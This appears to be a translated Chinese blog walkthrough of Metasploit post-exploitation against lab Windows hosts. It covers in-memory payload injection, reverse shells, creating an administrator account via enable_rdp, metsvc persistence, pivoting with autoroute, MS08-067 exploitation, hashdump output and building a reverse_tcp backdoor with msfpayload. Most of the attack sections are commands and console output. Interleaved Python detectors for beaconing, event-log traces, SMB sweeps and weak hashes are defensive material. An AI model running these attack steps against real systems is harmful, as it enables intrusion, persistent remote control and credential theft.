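Both the reverse_https agent above, which keeps reconnecting until its communication timeout, and the persistence agent, which calls back every 5 seconds (-i 5), leave the same trace on the wire: regular outbound connections from one host to one destination and port. Here is the check a defender would run over proxy or firewall logs to find that pattern. This is an added example, not part of the original post and not Metasploit code; the log lines and their field layout (time, source, destination, destination port) are constructed for the demonstration, with the 5.5.5.x addresses borrowed from the transcripts above.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed log sample, one connection per line: "<ISO time> <src> <dst> <dport>".
# 5.5.5.3 -> 5.5.5.1:1111 is a 5-second beacon; the 443 traffic is a person
# browsing; the two SMB connections are too few to judge.
SAMPLE_LOG = """\
2012-03-21T23:40:00 5.5.5.3 5.5.5.1 1111
2012-03-21T23:40:02 5.5.5.3 93.184.216.34 443
2012-03-21T23:40:05 5.5.5.3 5.5.5.1 1111
2012-03-21T23:40:09 5.5.5.3 93.184.216.34 443
2012-03-21T23:40:10 5.5.5.3 5.5.5.1 1111
2012-03-21T23:40:12 5.5.5.3 10.0.0.9 445
2012-03-21T23:40:15 5.5.5.3 5.5.5.1 1111
2012-03-21T23:40:20 5.5.5.3 5.5.5.1 1111
2012-03-21T23:40:25 5.5.5.3 5.5.5.1 1111
2012-03-21T23:40:30 5.5.5.3 5.5.5.1 1111
2012-03-21T23:40:35 5.5.5.3 5.5.5.1 1111
2012-03-21T23:41:30 5.5.5.3 93.184.216.34 443
2012-03-21T23:41:31 5.5.5.3 93.184.216.34 443
2012-03-21T23:43:15 5.5.5.3 93.184.216.34 443
2012-03-21T23:45:12 5.5.5.3 10.0.0.9 445
2012-03-21T23:46:02 5.5.5.3 93.184.216.34 443
"""

Flow = Tuple[str, str, int]  # (src, dst, dport)

def parse_log(text: str) -> Dict[Flow, List[datetime]]:
    """Group connection timestamps by (src, dst, dport) flow."""
    flows: Dict[Flow, List[datetime]] = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        flows[(src, dst, int(port))].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(flows: Dict[Flow, List[datetime]],
                 min_hits: int = 5, max_cv: float = 0.2) -> List[dict]:
    """Flag flows whose inter-connection gaps are regular: a low coefficient of
    variation (stdev / mean) over at least min_hits connections. A fixed-interval
    agent scores cv = 0; human browsing is bursty and scores far above max_cv."""
    beacons = []
    for (src, dst, port), times in flows.items():
        if len(times) < min_hits:
            continue  # not enough samples to call a rhythm
        times = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue  # duplicate timestamps, nothing to measure
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "port": port, "hits": len(times),
                            "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return sorted(beacons, key=lambda b: (b["cv"], -b["hits"]))

if __name__ == "__main__":
    for b in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"beacon {b['src']} -> {b['dst']}:{b['port']} every {b['interval_s']}s "
              f"({b['hits']} hits, cv={b['cv']})")
```

The thresholds are the tuning knobs: max_cv near zero catches only jitter-free callbacks like the ones these scripts produce, while agents that add random sleep need a looser value and a longer window, and the same grouping works on NetFlow or DNS logs once they are reduced to flows.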

payload inject

Inject another payload into a process on the target. Note that HANDLER is false in the options below, so a reverse_https listener on port 9999 must already be running or the injected stager has nothing to connect to. For example:

msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf  post(payload_inject) >
msf  post(payload_inject) > show options 

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  post(payload_inject) > set LPORT 9999
LPORT => 9999
msf  post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf  post(payload_inject) > set SESSION 5
SESSION => 5
msf  post(payload_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf  post(payload_inject) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(payload_inject) >

TCP Shell Session

Sets up a reverse shell using whichever scripting runtime the target has installed: auto, ruby, python, perl or bash; it works on Linux too.
Since I have none of those installed on the target... you know the drill.

msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(system_session) > set SESSION 5
SESSION => 5
msf  post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf  post(system_session) > set TYPE bash
TYPE => bash
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) > set TYPE python
TYPE => python
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf  post(system_session) > set LPORT 5555
LPORT => 5555
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) >

pxexploit

Read the module description:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
I don't have the environment for it, so it is not demonstrated.

Automatic 3389 (RDP)

Very simple: enter the module and set the account, password and port.

msf  post(enable_rdp) > show options 

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf  post(enable_rdp) > set USERNAME test
USERNAME => test
msf  post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf  post(enable_rdp) > set SESSION 5
SESSION => 5
msf  post(enable_rdp) > exploit 

[*] Enabling Remote Desktop
[*]  RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]  The Terminal Services service is not set to auto, changing it to auto ...
[*]  Opening port in local firewall if necessary
[*] Setting user account for logon
[*]  Adding User: test with Password: test
[*]  Adding User: test to local group 'Remote Desktop Users'
[*]  Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf  post(enable_rdp) >

Let's check whether 3389 is open:

msf  post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389

Connection to 5.5.5.3 3389 port [tcp/*] succeeded!

It is open; you can of course use a different port as well.

Inject in Memory

This one is impressive: in-memory injection.

msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf  post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf  post(multi_meterpreter_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf  post(multi_meterpreter_inject) >

Shell obtained successfully.

metsvc door

This one starts as a system service.
First, get the tool:

brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s  

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$

Then upload:

meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >

Install the service:

meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

c:\windows>metsvc.exe install-service
metsvc.exe install-service
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

c:\windows>

Then, as you would expect:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(handler) > exploit 

[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

meterpreter >
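The enable_rdp run and the metsvc service installation above both leave ordinary Windows event-log records behind. The following is an added example, not code from the original post or from Metasploit: it correlates a constructed key=value export of Security and System events (the event IDs 4720, 4732, 7040 and 7045 are the real ones; the export format and the assumption that MemberName has already been resolved from the member SID are mine).

```python
"""Triage of a Windows event-log export for the traces left by the steps above:
enable_rdp (TermService set to auto start, a new account placed into
'Remote Desktop Users' / 'Administrators') and metsvc (a new service whose
binary was dropped straight into the Windows root directory)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed export, one event per line:
#   "timestamp|event_id|computer|key=value;key=value;..."
# Event IDs are the real Windows ones; field names follow each event's EventData,
# except that MemberName is assumed already resolved from the member SID.
SAMPLE_EVENTS = r"""
2012-03-22 00:31:19|7040|DIS9TEAM-A1|param1=Terminal Services;param2=demand start;param3=auto start;param4=TermService
2012-03-22 00:31:20|4720|DIS9TEAM-A1|TargetUserName=test;SubjectUserName=brk
2012-03-22 00:31:20|4732|DIS9TEAM-A1|MemberName=test;TargetUserName=Remote Desktop Users
2012-03-22 00:31:21|4732|DIS9TEAM-A1|MemberName=test;TargetUserName=Administrators
2012-03-22 01:01:40|7045|DIS9TEAM-A1|ServiceName=metsvc;ImagePath=C:\windows\metsvc-server.exe
2012-03-21 09:00:00|7045|DIS9TEAM-A1|ServiceName=wuauserv;ImagePath=C:\Windows\System32\svchost.exe -k netsvcs
2012-03-22 00:10:00|4720|FILESRV01|TargetUserName=svc_backup;SubjectUserName=admin
"""

WINDOW = timedelta(minutes=15)                   # how close "created" and "added to group" must be
RDP_GROUPS = {"Remote Desktop Users", "Administrators"}
SYSTEM_ROOTS = ("c:\\windows", "%systemroot%")    # a service binary directly here is unusual


def parse_events(text):
    """Turn the export into dicts; the key=value fields become keys of each event."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, host, data = line.split("|", 3)
        fields = dict(kv.split("=", 1) for kv in data.split(";") if "=" in kv)
        events.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "id": int(eid), "host": host, **fields})
    return sorted(events, key=lambda e: e["time"])


def triage(text):
    """Return (host, rule, subject, details) tuples for every suspicious trace."""
    findings = []
    by_host = defaultdict(list)
    for ev in parse_events(text):
        by_host[ev["host"]].append(ev)
    for host, evs in by_host.items():
        # Rule 1: an account is created and, within WINDOW, put into an RDP-capable group.
        for created in (e for e in evs if e["id"] == 4720):
            user = created["TargetUserName"]
            groups = sorted({e["TargetUserName"] for e in evs
                             if e["id"] == 4732 and e.get("MemberName") == user
                             and e["TargetUserName"] in RDP_GROUPS
                             and abs(e["time"] - created["time"]) <= WINDOW})
            if groups:
                findings.append((host, "new_user_granted_rdp_or_admin", user, groups))
        # Rule 2: Terminal Services switched to auto start (enable_rdp's first step).
        for ev in (e for e in evs if e["id"] == 7040 and e.get("param4") == "TermService"):
            if "auto" in ev.get("param3", "").lower():
                findings.append((host, "rdp_service_set_to_auto_start", ev["param4"], [ev["param3"]]))
        # Rule 3: a newly installed service whose executable sits directly in the Windows root.
        for ev in (e for e in evs if e["id"] == 7045):
            exe = ev.get("ImagePath", "").strip('"').split(" ")[0]
            parent = exe.rsplit("\\", 1)[0].lower()
            if parent in SYSTEM_ROOTS:
                findings.append((host, "service_binary_in_windows_root", ev["ServiceName"], [exe]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(*finding)
```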

Closing remarks

There is a lot more I wanted to cover, but there was no time to set up the environments, so it ends here.

A detailed walkthrough of pivoting with Metasploit

First, by whatever means, get a shell, a SYSTEM-level shell, and establish a meterpreter session.
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > getsystem
…got system (via technique 1).

Then look at the local IP configuration:

meterpreter > ipconfig /all

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 65539
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU          : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0

Then list the local subnets:

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0

OK, now we add the local gateway and IP address, creating a virtual routing function inside the session:

meterpreter > run autoroute -h
Get a list of local subnets based on the host’s routes
USAGE: run get_local_subnets

OPTIONS:

-D        Delete all routes (does not require a subnet)
-d        Delete the named route instead of adding it
-h        Help and usage
-n <opt>  Netmask (IPv4, for example, 255.255.255.0
-p        Print active routing table. All other options are ignored
-s <opt>  Subnet (IPv4, for example, 10.10.10.0)

No further explanation needed; it is self-explanatory. We add the IP address and subnet mask:

meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0…
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes

The route is added automatically; now check the routing table:

meterpreter > run autoroute -p

Active Routing Table
====================

Subnet             Netmask            Gateway
------             -------            -------
192.168.0.0        255.255.255.0      Session 1

Created successfully: the current session now works as a virtual router. Background the current session:

meterpreter >
Background session 1? [y/N]

Scan the machines on the target network for SMB version information, to learn something about the hosts that have SMB open:

msf  auxiliary(smb_version) > run

[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese – Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
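Seen from a sensor inside the LAN, the smb_version sweep above comes from the pivot host 192.168.0.116, not from the attacker's address, so it has to be detected by behaviour rather than by source. The following is an added example (not from the original post or from Metasploit) that counts, per source, the distinct peers contacted on 445 within a sliding window over a constructed connection log; the log format and the thresholds are assumptions.

```python
"""Spotting the lateral SMB sweep from the network side: once traffic is pivoted
through a compromised host, the scan's source address is that host, so the sweep
is caught by counting how many distinct internal peers one host touches on 445
within a short window."""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 20                   # distinct peers on 445 from one source ...
WINDOW = timedelta(seconds=60)   # ... within this sliding time window


def make_sample_log():
    """Constructed connection log: 'YYYY-mm-dd HH:MM:SS src dst dport' per line."""
    base = datetime(2012, 3, 24, 0, 35, 0)
    lines = []
    # Benign: a workstation repeatedly opening SMB to one file server.
    for i in range(30):
        lines.append(f"{base + timedelta(seconds=3 * i):%Y-%m-%d %H:%M:%S} "
                     f"192.168.0.100 192.168.0.116 445")
    # Sweep: the pivot host probing every address of its /24 within about 25 s
    # (what the smb_version run above looks like to a sensor inside the LAN).
    for i in range(1, 255):
        lines.append(f"{base + timedelta(seconds=i / 10):%Y-%m-%d %H:%M:%S} "
                     f"192.168.0.116 192.168.0.{i} 445")
    return "\n".join(lines)


def detect_sweeps(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return {src: {'distinct_hosts': n, 'window_end': ts}} for every source whose
    peak number of distinct 445 peers inside any window reaches the threshold."""
    per_src = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        date, clock, src, dst, dport = line.split()
        if dport != "445":
            continue
        per_src[src].append((datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S"), dst))

    alerts = {}
    for src, events in per_src.items():
        events.sort()
        recent, peers, peak, peak_end = deque(), Counter(), 0, None
        for ts, dst in events:
            recent.append((ts, dst))
            peers[dst] += 1
            # Slide the window: forget connections older than WINDOW.
            while ts - recent[0][0] > window:
                _, old_dst = recent.popleft()
                peers[old_dst] -= 1
                if peers[old_dst] == 0:
                    del peers[old_dst]
            if len(peers) > peak:
                peak, peak_end = len(peers), ts
        if peak >= threshold:
            alerts[src] = {"distinct_hosts": peak, "window_end": peak_end}
    return alerts


if __name__ == "__main__":
    for src, info in detect_sweeps(make_sample_log()).items():
        print(f"{src}: {info['distinct_hosts']} distinct hosts on 445 by {info['window_end']}")
```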

Lucky: there is a Windows 2000 Server machine on the internal network. Let's try MS08-067; that should take it without trouble.

msf  exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf  exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf  exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – Service Pack 4 with MS05-010+ – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012

meterpreter >

Lucky twice in a row; time to buy a lottery ticket. The exploit succeeded; now look at the IP configuration:

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 16777219
============
Name         : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU          : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0

Right, this really is an internal-network machine behind our target; its IP differs from the one above.

Now grab the hashes:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::
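What a listing like the one above tells a defender can be checked mechanically. The following is an added example, not part of the original post: it reads pwdump-format lines and flags empty passwords, accounts that still have an LM hash stored, and accounts sharing an NT hash; the non-empty hash values in the sample are constructed placeholders.

```python
"""Auditing a hashdump / pwdump listing from the defender's side. Two well-known
constants identify accounts with no password and accounts for which an LM hash is
still stored (LM storage not disabled, so the password is at most 14 characters
and cheap to crack offline); identical NT hashes mean identical passwords."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is off or the password is empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed sample in pwdump format (user:rid:lm:nt:::). Account names and the two
# empty-password entries mirror the listing above; the other hash values are made-up
# placeholders, and svc_constructed deliberately shares TsInternetUser's NT hash.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:11111111111111111111111111111111:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
IWAM_J86PG7C8XQQPZDD:1002:22222222222222222222222222222222:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:::
TsInternetUser:1000:aad3b435b51404eeaad3b435b51404ee:cccccccccccccccccccccccccccccccc:::
svc_constructed:1003:aad3b435b51404eeaad3b435b51404ee:cccccccccccccccccccccccccccccccc:::
"""


def parse_pwdump(text):
    """Parse 'user:rid:lm:nt:::' lines; blank lines and '#' comments are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, rid, lm, nt = line.split(":")[:4]
        records.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return records


def audit(text):
    """Return {rule: [...]} listing the accounts each rule matched."""
    findings = {"empty_password": [], "lm_hash_stored": [], "nt_hash_reuse": []}
    by_nt = defaultdict(list)
    for r in parse_pwdump(text):
        if r["nt"] == EMPTY_NT:
            # pwdump carries no enabled/disabled flag: confirm the account status
            # separately (Guest is normally disabled, Administrator normally is not).
            findings["empty_password"].append(r["user"])
        else:
            by_nt[r["nt"]].append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(r["user"])
    # NT hashes are unsalted, so equal hashes mean equal passwords across accounts.
    findings["nt_hash_reuse"] = [sorted(users) for users in by_nt.values() if len(users) > 1]
    return findings


if __name__ == "__main__":
    for rule, accounts in audit(SAMPLE_DUMP).items():
        print(f"{rule}: {accounts}")
```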

Background it and take a look:

meterpreter >
Background session 2? [y/N]
msf  exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
--  ----                   -----------                            ----------
1   meterpreter x86/win32  MILSEC\Administrator @ MILSEC          xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD  xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)

msf  exploit(ms08_067_netapi) >
Two different internal IPs and two different external IPs, which shows these are two different machines exploited through the same pivot setup.

On Linux this needs root privileges, otherwise autoroute runs into problems. Linux will be covered tomorrow; I hope this helps when you do internal-network audits...

Metasploit privilege escalation | metasploit -> meterpreter: one command to escalate privileges, one command to open 3389, a formidable escalation tool

Attack

First, the Apache in my VM runs without system privileges.

Let's generate a door (backdoor):

root@Dis9Team:~$ sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 x > /var/www/door.exe
[sudo] password for brk:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.1", "LPORT"=>"4444"}

Then upload it to the server through the web shell and run it, with metasploit listening locally.

Look at the terminal: the shell came in.

You can let the powerful meterpreter session escalate privileges for you; it automatically runs local exploits old and new, and even has one for 360:

meterpreter > getuid
Server username: DIS9TEAM-5FA711\apache   ==> not system privileges
meterpreter > getsystem                   ==> run one command
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM      ==> the legendary exploit
meterpreter >

If antivirus is installed, you can bypass it too:

